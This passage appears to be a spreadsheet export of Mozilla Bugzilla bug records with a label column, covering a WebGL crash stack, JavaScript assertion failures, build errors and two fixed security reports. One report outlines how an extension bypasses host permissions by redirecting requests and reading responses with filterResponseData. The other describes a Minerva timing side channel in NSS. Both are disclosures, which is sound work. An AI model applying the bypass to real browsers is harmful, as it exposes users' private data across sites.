48 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,43,void (mozilla::HostWebGLContext::*)(float, float) const,&amp;mozilla::HostWebGLContext::DepthRange&gt;::DispatchCommand+0x2ed4 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
49 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,42,void (mozilla::HostWebGLContext::*)(bool) const,&amp;mozilla::HostWebGLContext::DepthMask&gt;::DispatchCommand+0x2ed4 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4a (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,41,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::DepthFunc&gt;::DispatchCommand+0x34a9 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4b (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,40,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::CullFace&gt;::DispatchCommand+0x34a9 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4c (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,39,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&amp;mozilla::HostWebGLContext::CompileShader&gt;::DispatchCommand+0x354a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4d (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,38,void (mozilla::HostWebGLContext::*)(bool, bool, bool, bool) const,&amp;mozilla::HostWebGLContext::ColorMask&gt;::DispatchCommand+0x354a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4e (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,37,void (mozilla::HostWebGLContext::*)(int) const,&amp;mozilla::HostWebGLContext::ClearStencil&gt;::DispatchCommand+0x354a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
4f (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,36,void (mozilla::HostWebGLContext::*)(float) const,&amp;mozilla::HostWebGLContext::ClearDepth&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
50 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,35,void (mozilla::HostWebGLContext::*)(float, float, float, float) const,&amp;mozilla::HostWebGLContext::ClearColor&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
51 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,34,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::Clear&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
52 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,33,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlendFuncSeparate&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
53 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,32,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlendEquationSeparate&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
54 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,31,void (mozilla::HostWebGLContext::*)(float, float, float, float) const,&amp;mozilla::HostWebGLContext::BlendColor&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
55 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,30,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindFramebuffer&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
56 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,29,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, const std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::BindAttribLocation&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
57 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,28,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::AttachShader&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
58 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,27,void (mozilla::HostWebGLContext::*)(),&amp;mozilla::HostWebGLContext::DidRefresh&gt;::DispatchCommand+0x3592 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
59 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,26,void (mozilla::HostWebGLContext::*)(mozilla::WebGLExtensionID),&amp;mozilla::HostWebGLContext::RequestExtension&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5a (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,25,void (mozilla::HostWebGLContext::*)(const mozilla::avec2&lt;unsigned int&gt; &amp;),&amp;mozilla::HostWebGLContext::Resize&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5b (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,24,void (mozilla::HostWebGLContext::*)(unsigned int, const std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::GenerateError&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5c (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,23,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::Enable&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5d (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,22,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::Disable&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5e (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,21,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteVertexArray&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
5f (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,20,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteTransformFeedback&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
60 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,19,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteTexture&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
61 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,18,void (mozilla::HostWebGLContext::*)(unsigned long long),&amp;mozilla::HostWebGLContext::DeleteSync&gt;::DispatchCommand+0x3699 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
62 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,17,void (mozilla::HostWebGLContext::*)(u</t>
        </is>
      </c>
      <c r="X3684" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3685">
      <c r="A3685" t="n">
        <v>215878</v>
      </c>
      <c r="B3685" t="inlineStr">
        <is>
          <t>2003-08-11 18:02:34 -0700</t>
        </is>
      </c>
      <c r="C3685" t="inlineStr">
        <is>
          <t>Assertion failure with JS Strict warnings enabled</t>
        </is>
      </c>
      <c r="D3685" t="inlineStr">
        <is>
          <t>2005-10-13 19:52:18 -0700</t>
        </is>
      </c>
      <c r="E3685" t="n">
        <v>1</v>
      </c>
      <c r="F3685" t="n">
        <v>1</v>
      </c>
      <c r="G3685" t="n">
        <v>3</v>
      </c>
      <c r="H3685" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3685" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3685" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3685" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3685" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3685" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N3685" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3685" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3685" t="inlineStr"/>
      <c r="Q3685" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3685" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3685" t="inlineStr">
        <is>
          <t>mozilla1.5beta</t>
        </is>
      </c>
      <c r="T3685" t="n">
        <v>1</v>
      </c>
      <c r="U3685" t="n">
        <v>0</v>
      </c>
      <c r="V3685" t="n">
        <v>22</v>
      </c>
      <c r="W3685" t="inlineStr">
        <is>
          <t>confirmed from "WD" with his win2k MSVC7 build and also with my 20030811 MSVC6 debug
1) start you Mozilla win32 debug build
2) Enable JS strict warnings in edit\preferences\debug
3) load URL (http://www.plumtree.com)
4) get an assertion failure (see attachment)
Assertion failure: top != 0, at d:/moz_source/gmake/mozilla/win32_de/js/src/../.
./../js/src/jsopcode.c:625</t>
        </is>
      </c>
      <c r="X3685" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3686">
      <c r="A3686" t="n">
        <v>1395065</v>
      </c>
      <c r="B3686" t="inlineStr">
        <is>
          <t>2017-08-30 00:34:11 -0700</t>
        </is>
      </c>
      <c r="C3686" t="inlineStr">
        <is>
          <t>[onboarding] change overlay icon position will overlap the newtab "restore all" button</t>
        </is>
      </c>
      <c r="D3686" t="inlineStr">
        <is>
          <t>2017-10-12 07:14:12 -0700</t>
        </is>
      </c>
      <c r="E3686" t="n">
        <v>1</v>
      </c>
      <c r="F3686" t="n">
        <v>1</v>
      </c>
      <c r="G3686" t="n">
        <v>2</v>
      </c>
      <c r="H3686" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3686" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3686" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K3686" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3686" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3686" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3686" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3686" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3686" t="inlineStr">
        <is>
          <t>[photon-onboarding][photon-onboarding-newui]</t>
        </is>
      </c>
      <c r="Q3686" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3686" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3686" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3686" t="n">
        <v>1</v>
      </c>
      <c r="U3686" t="n">
        <v>0</v>
      </c>
      <c r="V3686" t="n">
        <v>23</v>
      </c>
      <c r="W3686" t="inlineStr">
        <is>
          <t>Moving the overlay icon position change discussion from https://bugzilla.mozilla.org/show_bug.cgi?id=1392468#c7
new Icon position (top: 12px, left: 12px) will overlap the `restore all` message button on classic newtab(not activity stream), and cause test fail (the mouse can't click the `restore all` link).
The under message is `Thumbnail removed, Undo / Restore All` and take about 20px height. 
The current position(top 34px, left 34px) does not have that issue.
Dao preffer keeping support (newtab and activity stream) without break newtab undo test (In bug 1392468 comment 21)</t>
        </is>
      </c>
      <c r="X3686" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3687">
      <c r="A3687" t="n">
        <v>748119</v>
      </c>
      <c r="B3687" t="inlineStr">
        <is>
          <t>2012-04-23 14:11:50 -0700</t>
        </is>
      </c>
      <c r="C3687" t="inlineStr">
        <is>
          <t>Assertion failure: IsMarkedOrAllocated(static_cast&lt;Cell *&gt;(*thingp)), at jsgc.cpp:4284</t>
        </is>
      </c>
      <c r="D3687" t="inlineStr">
        <is>
          <t>2013-01-19 14:09:41 -0800</t>
        </is>
      </c>
      <c r="E3687" t="n">
        <v>1</v>
      </c>
      <c r="F3687" t="n">
        <v>1</v>
      </c>
      <c r="G3687" t="n">
        <v>3</v>
      </c>
      <c r="H3687" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3687" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3687" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3687" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3687" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3687" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3687" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3687" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3687" t="inlineStr">
        <is>
          <t>js-triage-needed, [sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3687" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3687" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3687" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3687" t="n">
        <v>1</v>
      </c>
      <c r="U3687" t="n">
        <v>0</v>
      </c>
      <c r="V3687" t="n">
        <v>10</v>
      </c>
      <c r="W3687" t="inlineStr">
        <is>
          <t>Created attachment 617640
Test case for shell (run with -n -m -a)
The attached test asserts on mozilla-central revision 17af008937e3 (options -m -n -a).</t>
        </is>
      </c>
      <c r="X3687" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3688">
      <c r="A3688" t="n">
        <v>512327</v>
      </c>
      <c r="B3688" t="inlineStr">
        <is>
          <t>2009-08-24 14:20:30 -0700</t>
        </is>
      </c>
      <c r="C3688" t="inlineStr">
        <is>
          <t>Update liboggz</t>
        </is>
      </c>
      <c r="D3688" t="inlineStr">
        <is>
          <t>2017-11-08 12:02:47 -0800</t>
        </is>
      </c>
      <c r="E3688" t="n">
        <v>1</v>
      </c>
      <c r="F3688" t="n">
        <v>1</v>
      </c>
      <c r="G3688" t="n">
        <v>3</v>
      </c>
      <c r="H3688" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3688" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3688" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3688" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3688" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3688" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3688" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3688" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3688" t="inlineStr"/>
      <c r="Q3688" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3688" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3688" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T3688" t="n">
        <v>1</v>
      </c>
      <c r="U3688" t="n">
        <v>0</v>
      </c>
      <c r="V3688" t="n">
        <v>15</v>
      </c>
      <c r="W3688" t="inlineStr">
        <is>
          <t>We should update liboggz to pickup recent fixes.</t>
        </is>
      </c>
      <c r="X3688" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3689">
      <c r="A3689" t="n">
        <v>1437325</v>
      </c>
      <c r="B3689" t="inlineStr">
        <is>
          <t>2018-02-10 15:17:26 -0800</t>
        </is>
      </c>
      <c r="C3689" t="inlineStr">
        <is>
          <t>Web extension - Web Request host permission bypass using filterReponseData</t>
        </is>
      </c>
      <c r="D3689" t="inlineStr">
        <is>
          <t>2018-11-05 14:24:16 -0800</t>
        </is>
      </c>
      <c r="E3689" t="n">
        <v>1</v>
      </c>
      <c r="F3689" t="n">
        <v>1</v>
      </c>
      <c r="G3689" t="n">
        <v>3</v>
      </c>
      <c r="H3689" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3689" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J3689" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K3689" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L3689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3689" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3689" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3689" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q3689" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3689" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3689" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T3689" t="n">
        <v>1</v>
      </c>
      <c r="U3689" t="n">
        <v>0</v>
      </c>
      <c r="V3689" t="n">
        <v>11</v>
      </c>
      <c r="W3689" t="inlineStr">
        <is>
          <t>Created attachment 8950022
WebRequestHostBypass.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180206200532
Steps to reproduce:
By leveraging the request redirection and filterReponseData, one can bypass the host permission to access content returned by an arbitrary host.
Actual results:
The attachment is a POC extension that have the webRequest, webRequestBlocking and http://localhost permission that upon loading will :
1- Open a new tabs to http://localhost
2- Redirect the request toward https://bugzilla.mozilla.org/user_profile
3- Output the content of https://bugzilla.mozilla.org/user_profile in the console
4- Close the tab
Expected results:
filterResponseData should be allowed only if the extension has the host permission for the fetched resource.</t>
        </is>
      </c>
      <c r="X3689" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3690">
      <c r="A3690" t="n">
        <v>1853908</v>
      </c>
      <c r="B3690" t="inlineStr">
        <is>
          <t>2023-09-19 05:42:10 -0700</t>
        </is>
      </c>
      <c r="C3690" t="inlineStr">
        <is>
          <t>Minerva attack on P-256 and P-384 in NSS</t>
        </is>
      </c>
      <c r="D3690" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:55 -0700</t>
        </is>
      </c>
      <c r="E3690" t="n">
        <v>1</v>
      </c>
      <c r="F3690" t="n">
        <v>1</v>
      </c>
      <c r="G3690" t="n">
        <v>3</v>
      </c>
      <c r="H3690" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3690" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3690" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3690" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3690" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3690" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3690" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3690" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3690" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main121+]</t>
        </is>
      </c>
      <c r="Q3690" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3690" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3690" t="inlineStr">
        <is>
          <t>3.95</t>
        </is>
      </c>
      <c r="T3690" t="n">
        <v>1</v>
      </c>
      <c r="U3690" t="n">
        <v>0</v>
      </c>
      <c r="V3690" t="n">
        <v>25</v>
      </c>
      <c r="W3690" t="inlineStr">
        <is>
          <t>Created attachment 9353882
In this zip file there are 2 png images. One is called conf_interval_plot_median_before_K_generation and the other conf_interval_plot_median_K_generation
Steps to reproduce:
My team and I have tested NSS and we found that it is vulnerable to the Minerva attack and we have now identified the first piece of code that contributes to the side channel. 
The test scenario is that we are signing random messages using the SEC_SignData API and then using the private key to extract the K value from the signatures. Then based on the bit size of the extracted nonce we compare full-sized nonces to smaller ones and use the statistical tests to compare the signature times. 
Actual results:
Now we have executed the test to verify that all the code from SEC_SignData up to line https://github.com/nss-dev/nss/blob/master/lib/freebl/ec.c#L978 is not leaky and then we have verified that the code in lines https://github.com/nss-dev/nss/blob/master/lib/freebl/ec.c#L979-L986 does leak. We suspect that the side channel is caused by the fact that K is an MPI object, and thus subject to normalization (automatic memory management based on bit size). You can see the results of the analysis below.
For testing, we built nss statically from hg and used the master checkout from 2023-09-14 for both nss and nspr.
The result in the attachment namedconf_interval_plot_median_before_K_generation.png represents code from SEC_SignData up to line 978 of file lib/freebl/ec.c and as you can see in this code there is no leak found. The sample tested has 102,723,896 observations.
The result in the attachment named conf_interval_plot_median_K_generation.png represents code from line 979 to line 986 in file lib/freebl/ec.c and we can clearly see that there is a leak: there is a clear dependency between the bit size of K and the size of the side channel. The sample tested has 129,438,263 observations.
Because we have identified this piece of code as leaky we won't be able to exclude the possibility of a side-channel in the subsequent code. We will need to run the test again after the leaking piece of code is fixed to be able to verify that NSS is not valuable to Minerva anymore (overall we have found a side-channel of ~50 ns and in the k-generating piece of code is only ~45 ns, although the extra 5 ns could be the effect of this piece of code not being side-channel free on the subsequent signature code). 
Expected results:
The code should have no side-channels.</t>
        </is>
      </c>
      <c r="X3690" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3691">
      <c r="A3691" t="n">
        <v>1533760</v>
      </c>
      <c r="B3691" t="inlineStr">
        <is>
          <t>2019-03-08 07:38:25 -0800</t>
        </is>
      </c>
      <c r="C3691" t="inlineStr">
        <is>
          <t>Solaris: Text relocation remains against symbol ff_cos_512 referenced in in file x86/fft.o</t>
        </is>
      </c>
      <c r="D3691" t="inlineStr">
        <is>
          <t>2020-12-15 20:24:11 -0800</t>
        </is>
      </c>
      <c r="E3691" t="n">
        <v>1</v>
      </c>
      <c r="F3691" t="n">
        <v>1</v>
      </c>
      <c r="G3691" t="n">
        <v>7</v>
      </c>
      <c r="H3691" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3691" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3691" t="inlineStr">
        <is>
          <t>General: Unsupported Platforms</t>
        </is>
      </c>
      <c r="K3691" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3691" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3691" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3691" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3691" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3691" t="inlineStr"/>
      <c r="Q3691" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R3691" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3691" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T3691" t="n">
        <v>0</v>
      </c>
      <c r="U3691" t="n">
        <v>0</v>
      </c>
      <c r="V3691" t="n">
        <v>14</v>
      </c>
      <c r="W3691" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Steps to reproduce:
/usr/bin/gcc -std=gnu99 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fstack-protector-strong -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fstack-protector-strong -fno-strict-aliasing -ffunction-sections -fdata-sections -fno-math-errno -pthread -pipe -g -O -fno-omit-frame-pointer -funwind-tables -Wall -Wempty-body -Wignored-qualifiers -Wpointer-arith -Wsign-compare -Wtype-limits -Wunreachable-code -Wduplicated-cond -Wno-error=maybe-uninitialized -Wno-error=deprecated-declarations -Wno-error=array-bounds -Wno-error=free-nonheap-object -Wformat -Wformat-overflow=2  -fPIC -shared -Wl,-h,libmozavcodec.so -o libmozavcodec.so @/builds/psumbera/FIREFOX-TRUNK/obj-x86_64-pc-solaris2.11/media/ffvpx/libavcodec/libmozavcodec_so.list   -lpthread -Wl,-z,text -L/builds/psumbera/FIREFOX-TRUNK/obj-x86_64-pc-solaris2.11/dist/bin     ../libavutil/libmozavutil.so   -lsocket  -lm
Text relocation remains                         referenced
    against symbol                  offset      in file
ff_cos_512                          0xcb7       x86/fft.o
ff_cos_512                          0x1037      x86/fft.o
ff_cos_512                          0x13e7      x86/fft.o
ff_cos_512                          0x1797      x86/fft.o
ff_cos_256                          0xc77       x86/fft.o
ff_cos_256                          0xff7       x86/fft.o
ff_cos_256                          0x13a7      x86/fft.o
ff_cos_256                          0x1757      x86/fft.o
ff_cos_65536                        0xe77       x86/fft.o
..
In upstream I see that  they use '-mimpure-text' for Solaris (though -fPIC would be probably better but it doesn't work).
And I can do linking with '-mimpure-text' but it cannot be used together with '-Wl,-z,text' which comes probably from old-configure.in.</t>
        </is>
      </c>
      <c r="X3691" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3692">
      <c r="A3692" t="n">
        <v>1383913</v>
      </c>
      <c r="B3692" t="inlineStr">
        <is>
          <t>2017-07-24 14:27:32 -0700</t>
        </is>
      </c>
      <c r="C3692" t="inlineStr">
        <is>
          <t>CUI console error with popup in browserAction</t>
        </is>
      </c>
      <c r="D3692" t="inlineStr">
        <is>
          <t>2017-08-24 04:35:41 -0700</t>
        </is>
      </c>
      <c r="E3692" t="n">
        <v>1</v>
      </c>
      <c r="F3692" t="n">
        <v>1</v>
      </c>
      <c r="G3692" t="n">
        <v>2</v>
      </c>
      <c r="H3692" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3692" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3692" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K3692" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3692" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3692" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3692" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3692" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3692" t="inlineStr">
        <is>
          <t>[reserve-photon-structure]</t>
        </is>
      </c>
      <c r="Q3692" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3692" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3692" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3692" t="n">
        <v>1</v>
      </c>
      <c r="U3692" t="n">
        <v>0</v>
      </c>
      <c r="V3692" t="n">
        <v>5</v>
      </c>
      <c r="W3692" t="inlineStr">
        <is>
          <t>Produced with a browserAction (in overflow menu) that has 
